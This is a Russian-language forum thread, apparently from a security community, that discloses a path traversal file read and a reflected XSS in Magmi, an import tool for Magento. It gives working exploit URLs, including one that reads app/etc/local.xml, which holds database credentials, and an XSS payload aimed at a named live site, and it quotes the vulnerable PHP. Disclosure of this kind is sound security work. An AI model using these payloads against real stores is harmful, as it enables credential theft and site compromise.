Локальня читалка Magento: http://localhost/magmi/web/download_file.php?file=../../app/etc/local.xml Пример уязвимых урлов: Уязвимый код: PHP: $file=$_REQUEST["file"]; $f=@fopen($file,"r"); $err=error_get_last(); if($f!==false) { @fclose($f); } if($err==null) { // Extract the type of file which will be sent to the browser as a header $type = filetype($file); // Get a date and timestamp $today = date("F j, Y, g:i a"); $time = time(); // Send file headers header("Content-type: $type"); header("Content-Disposition: attachment;filename=".basename($file)); header("Content-Transfer-Encoding: binary"); header('Pragma: no-cache'); header('Expires: 0'); // Send the file contents. set_time_limit(0); readfile($file); } else { print_r($err); } P.S: В гугле по этой баге ничего не нашел. P.S: Обнаружил случайно в пакете с обновлением фикса баги _http://www.exploit-db.com/exploits/35052/ сам фикс с багой, читалкой на гитхабе https://github.com/dweeves/magmi-git Magento CE 1.8.x & 1.9.x
Хм, Magento на FreeBSD, возможно, можно сразу скомпроментировать, так как при чтении директории(это тоже файл!) можно получить список файлов. Сессия по умолчанию пишется в файловую си-му в install-dir/var/session обычно, в БД редко(в Wizard установщике по дефолту файловая си-ма )
спускай, а на гитхабе сделаем ссылку на пост)) пускай фиксят, бага все равно мало полезная... P.S:Пасивная XSS http://www.lowellcraft.com/magmi/web/ajax_gettime.php POSTrefix=<script>alert('xss')</script> magmi/web/ajax_gettime.php PHP: <?phpecho $_REQUEST["prefix"] . ":" . strftime("%c");?> При GET запросе на примерной площадке сробатывает мод секьюрети
ППЦ(((( https://www.trustwave.com/Resources...mmerce-platform-Magento-targeted-in-the-wild/ - себе багу присвоили, разместили статью от 13.10.2015
Оперативно они... хм, похожая бага тоже от февраля https://packetstormsecurity.com/files/130250/magmi-lfixss.txt
